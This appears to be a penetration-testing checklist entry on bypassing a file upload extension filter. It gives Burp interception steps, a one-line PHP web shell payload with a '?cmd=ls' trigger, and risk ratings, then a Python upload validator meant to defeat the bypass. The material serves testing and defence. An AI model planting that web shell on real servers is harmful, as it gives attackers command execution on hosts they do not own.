V11 - Business Logic
Unrestricted File Upload - File Extension Filter Bypass
POC
- Upload an image file
- Intercept the request with Burp
- Change filename="test.php.jpg" to filename="test.php"
- Keep the Content-Type: image/jpeg
- Include the following content in the file: <?php system($_GET['cmd'])?>
- Check whether this leads to command execution by appending ?cmd=ls to the image URL
Impact
Low-Medium
Likelihood
Low-Medium
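Server-side check that the POC above should fail against, as an added example (not part of the original checklist and not any particular application's code). The allowlist, the function name validate_upload and the sample byte strings are assumptions made for illustration; the Content-Type header is deliberately ignored because the client controls it.

```python
import os
import secrets

# Assumed policy for this sketch: only these image types, keyed by final extension,
# each with the leading bytes ("magic number") a real file of that type starts with.
ALLOWED = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
}

# Constructed sample inputs (not captured traffic).
SAMPLE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16
SAMPLE_SCRIPT = b"<?php /* script body */ ?>"


def validate_upload(filename, content_type, data):
    """Return (ok, reason, stored_name) for one uploaded part.

    content_type is the client-supplied header; it is accepted as a
    parameter only to show that it plays no role in the decision.
    """
    # Strip any client-supplied directory part, then take the FINAL extension.
    base = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(base.lower())[1]
    if ext not in ALLOWED:
        return False, "extension not allowed", None
    # The content must start with the signature of the claimed type.
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match extension", None
    # Never reuse the client's name: store under a random name with the
    # validated extension, so "test.php.jpg" cannot reach disk as-is.
    return True, "ok", secrets.token_hex(16) + ext


if __name__ == "__main__":
    for name, body in [("test.php", SAMPLE_SCRIPT),
                       ("test.php.jpg", SAMPLE_JPEG),
                       ("test.jpg", SAMPLE_SCRIPT)]:
        print(name, validate_upload(name, "image/jpeg", body))
```

A signature check does not stop a file that begins with a valid image header and carries script text later, so the upload directory should also be served with script execution disabled.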